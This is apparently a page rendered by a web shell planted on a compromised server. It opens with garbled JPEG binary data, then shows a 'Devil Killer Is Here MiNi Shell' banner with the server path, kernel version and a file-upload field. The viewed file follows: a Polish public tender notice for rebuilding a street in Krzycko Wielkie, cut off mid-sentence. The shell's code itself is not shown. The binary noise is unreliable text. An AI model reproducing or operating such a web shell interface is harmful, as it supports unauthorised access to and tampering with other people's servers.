JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211102/0025307201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa ulicy Adamowo w miejscowości Krzycko Wielkie na odcinku 120mb </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG GMINNYCH,WŁOSZAKOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411502887</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Karola Kurpińskiego 29</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Włoszakowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-140</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdg@wloszakowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://platformazakupowa.pl/pn/wloszakowice</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa ulicy Adamowo w miejscowości Krzycko Wielkie na odcinku 120mb </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-24efa46e-3bbf-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00253072</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-24efa46e-3bbf-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/wloszakowice</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W celu<br/>skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij<br/>wiadomość do zamawiającego”. 2. Za datę przekazania (wpływu) oświadczeń, wniosków,<br/>zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl<br/>poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat,<br/>że wiadomość została wysłana do zamawiającego.3. Zamawiający będzie przekazywał wykonawcom<br/>informacje w formie elektronicznej za pośrednictwem platformazakupowa.pl. Informacje dotyczące<br/>odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający<br/>będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z<br/>obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie<br/>elektronicznej za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.5. Zamawiający,<br/>zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu<br/>sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. 2020 poz. 2452) określa niezbędne wymagania sprzętowo - aplikacyjne<br/>umożliwiające pracę na platformazakupowa.pl , tj.:a) stały dostęp do sieci Internet o gwarantowanej<br/>przepustowości nie mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji:<br/>pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna<br/>przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,d) włączona obsługa<br/>JavaScript,e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f)<br/>szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g) oznaczenie czasu<br/>odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany<br/>wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.6.Formaty plików<br/>wykorzystywanych przez wykonawców powinny być zgodne Rozporządzeniem Rady Ministrów w<br/>sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i<br/>wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów<br/>teleinformatycznych”.1) Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg)<br/>ze szczególnym wskazaniem na .pdf2) W celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z formatów:a) .zip b) .7Z1) Wśród formatów powszechnych a nie<br/>występujących w rozporządzeniu występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.2) Zamawiający zwraca uwagę na<br/>ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na<br/>ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu<br/>osobistego, który wynosi max 5MB.3) Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy<br/>wcześniejsze podpisanie każdego ze skompresowanych plików. 4) Zamawiający rekomenduje<br/>wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.7. Wykonawca może zwrócić się do<br/>Zamawiającego z wnioskiem o wyjaśnienie treści SWZ. Wniosek należy złożyć, zgodnie z zapisami<br/>niniejszego Rozdziału SWZ, za pośrednictwem platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/pn/wloszakowice za pomocą formularza “Wyślij wiadomość do<br/>zamawiającego”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem danych osobowych Wykonawcy jest Kierownik Zarządu Dróg Gminnych we<br/>Włoszakowicach, ul. Karola<br/>Kurpińskiego 29, 64-140 Włoszakowice;<br/>2) Kontakt z inspektorem ochrony danych osobowych w Zarządzie Dróg Gminnych we<br/>Włoszakowicach możliwy jest za<br/>pośrednictwem adresu e-mail: iod@wloszakowice.pl;<br/>3) Dane osobowe przetwarzane będą na podstawie przepisów prawa - art. 6 ust. 1 lit. c RODO w celu<br/>związanym niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>4) Odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp oraz zgodnie z przepisami<br/>ustawy z 6 września 2001 r. o dostępie do informacji publicznej.<br/>5) Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp przez okres 4 lat<br/>od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego<br/>nienaruszalność; Jeżeli okres obowiązywania umowy w sprawie zamówienia publicznego przekracza 4<br/>lata, zamawiający przechowuje protokół postępowania wraz z załącznikami przez cały okres<br/>obowiązywania umowy w sprawie zamówienia publicznego.<br/>6) Obowiązek podania przez Wykonawcę danych osobowych bezpośrednio dotyczących Wykonawcy<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;<br/>7) W odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO;<br/>8) Wykonawca posiada:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Wykonawcy dotyczących,<br/>- na podstawie art. 16 RODO prawo do sprostowania swoich danych osobowych,<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>- prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pan/Pani, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO,<br/>9) nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>- prawo do przenoszenia danych osobowych, o których mowa w art. 20 RODO,<br/>-- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje o ograniczeniach stosowania<br/>przepisów RODO, o których mowa w art. 19 ust 2 i 3 ustawy Pzp.1. Skorzystanie przez osobę, której<br/>dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>2. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDG.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia obejmuje swoim zakresem przebudowę ulicy Adamowo w Krzycku Wielkim na odcinku 120mb.<br/>Na przedmiot zamówienia składa się w szczególności:<br/>1) Roboty przygotowawcze<br/>2) Podbudowę,<br/>3) Prace nawierzchniowe,<br/>4) Roboty wykończeniowe.<br/>Szczegółowy zakres robót opisany jest w przedmiarze robót stanowiącym załącznik nr 8 do<br/>SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Najkorzystniejszą ofertą będzie oferta, która przedstawi najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia. Zamawiający dokona wyboru<br/>oferty najkorzystniejszej w oparciu o następujące kryteria oceny ofert:<br/>Lp. Nazwa kryterium Waga (pkt) Sposób oceny<br/>1. Najniższa cena ofertowa brutto (Pc) 60 Wg wzoru<br/>2. Gwarancja jakości i rękojmi na wykonane roboty budowlane (Pg) 40 Wg sposobu wskazanego w<br/>pkt) 2 poniżej<br/>1) Najniższa cena ofertowa brutto (Pc) – waga kryterium to 60 pkt<br/>W przedmiotowym kryterium oceniana będzie cena ofertowa brutto, podana przez Wykonawcę w<br/>formularzu ofertowym (załącznik nr 1 do SWZ). Maksymalną liczbę punktów w tym kryterium otrzyma<br/>oferta z najniższą ceną ofertą (60 pkt). Pozostałe oferty zostaną ocenione wg następującego wzoru:<br/>Pc = Cn/Cb x 60 pkt<br/>Pc – oznacza punkty w kryterium „najniższej ceny ofertowej brutto”,<br/>Cn – oznacza najniższą oferowaną cenę brutto spośród podlegających odrzuceniu,<br/>Cb – oznacza cenę brutto badanej oferty.<br/>2) Gwarancja i rękojmia na wykonane roboty budowlane (Pg) – waga kryterium to 40 pkt<br/>W przedmiotowym kryterium oceniany będzie podany przez Wykonawcą w formularzu ofertowym<br/>(Załącznik nr 1 do SWZ) okres gwarancji i rękojmi na wykonane roboty budowlane. Okres gwarancji<br/>Wykonawca winien podać w miesiącach. Okres gwarancji i rękojmi liczony będzie od daty<br/>sporządzenia protokołu zdawczo - odbiorczego.<br/>Lp. Zadeklarowana długość gwarancji przez Wykonawcę dla wykonanych robót budowlanych:<br/>Przyznana ilość punktów w kryterium - Pg<br/>1. Poniżej 36 miesięcy 0 pkt<br/>2. od 36 do43 miesięcy 10 pkt<br/>3. od 44 do 51 miesięcy 20 pkt<br/>4. od 52 do 59 miesięcy 30 pkt<br/>5. powyżej 59 miesięcy 40 pkt<br/>Zamawiający zastrzega, że:<br/>1) W przypadku podania okresu gwarancji i rękojmi krótszego niż 36 miesięcy, Zamawiający na<br/>podstawie art. podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z<br/>uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia.<br/>2) W przypadku podania okresu gwarancji i rękojmi dłuższego niż 60 miesięcy, Zamawiający dla<br/>potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 60 miesięcy i<br/>oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>3) W przypadku braku zaznaczenia w formularzu ofertowym deklarowanego okresu gwarancji<br/>Zamawiający uzna, że Wykonawca zaoferował gwarancję na okres 36 miesięcy i oceni ofertę z<br/>uwzględnieniem takiego okresu gwarancji.<br/>4) W przypadku zaznaczenia przez Wykonawcę w formularzu ofertowym (Załącznik nr 1 do SWZ)<br/>więcej niż jednego deklarowanego okresu gwarancji i rękojmi na wykonane roboty budowlane,<br/>Zamawiający uzna, że Wykonawca zaoferował gwarancję na okres najkrótszy spośród oznaczonych<br/>przez Wykonawcę terminów gwarancji i rękojmi i oceni ofertę z uwzględnieniem takiego okresu<br/>gwarancji i rękojmi.<br/>5) Okres gwarancji i rękojmi na wykonane roboty budowlane zaoferowany przez Wykonawcę w ofercie<br/>będzie wiążący na etapie realizacji zamówienia.<br/>2. Zamawiający udzieli zamówienia Wykonawcy, którego oferta uzyska największą ilość punktów (P)<br/>obliczonych zgodnie z powyższymi zasadami wg wzoru:<br/>P = Pc + Pg<br/>3. Na podstawie powyższych kryteriów zostanie sporządzone zbiorcze zestawienie oceny ofert. Punkty<br/>będą liczone z dokładnością do dwóch miejsc po przecinku. Najwyższa suma liczby punktów<br/>uzyskanych w poszczególnych kryteriach wyznaczy najkorzystniejszą ofertę.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie oraz w niniejszej SWZ i zostanie oceniona jako<br/>najkorzystniejsza w oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu, dotyczące:<br/>1) Sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej, jeżeli<br/>wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej<br/>działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 150<br/>000,00 PLN.<br/>2) 4) Zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek dotyczący zdolności zawodowej, jeżeli wykaże, że:<br/>a) dysponuje następującymi osobami skierowanymi przez Wykonawcę do realizacji zamówienia<br/>publicznego, odpowiedzialnymi za kierowanie robotami budowlanymi:<br/>- minimum 1 osobą posiadającą odpowiednie kwalifikacje zawodowe i uprawnienia budowlane<br/>do pełnienia funkcji Kierownika robót będących przedmiotem niniejszego zamówienia.<br/>Posiadane przez w/w osoby uprawnienia w wymaganym zakresie, stosownie do wymagań<br/>określonych w SIWZ powinny być zgodne z ustawą z dnia 7 lipca 1994 roku Prawo budowlane<br/>(tj. Dz. U. 2020r. poz. 1333 ze zm.). Zamawiający uzna osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia<br/>7 lipca 1994 roku Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania<br/>przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały uprawnienia do pełnienia tych<br/>funkcji w dotychczasowym zakresie, jako spełniające przedmiotowy warunek.<br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>Regulację odrębną stanowią przepisy ustawy z 22 grudnia 2015 roku o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. 2021r.<br/>poz. 1646). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp Zamawiający wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>podmiotowych środków dowodowych, aktualnych na dzień złożenia, potwierdzających spełnienie<br/>warunków udziału w postępowaniu oraz brak podstaw wykluczenia, które 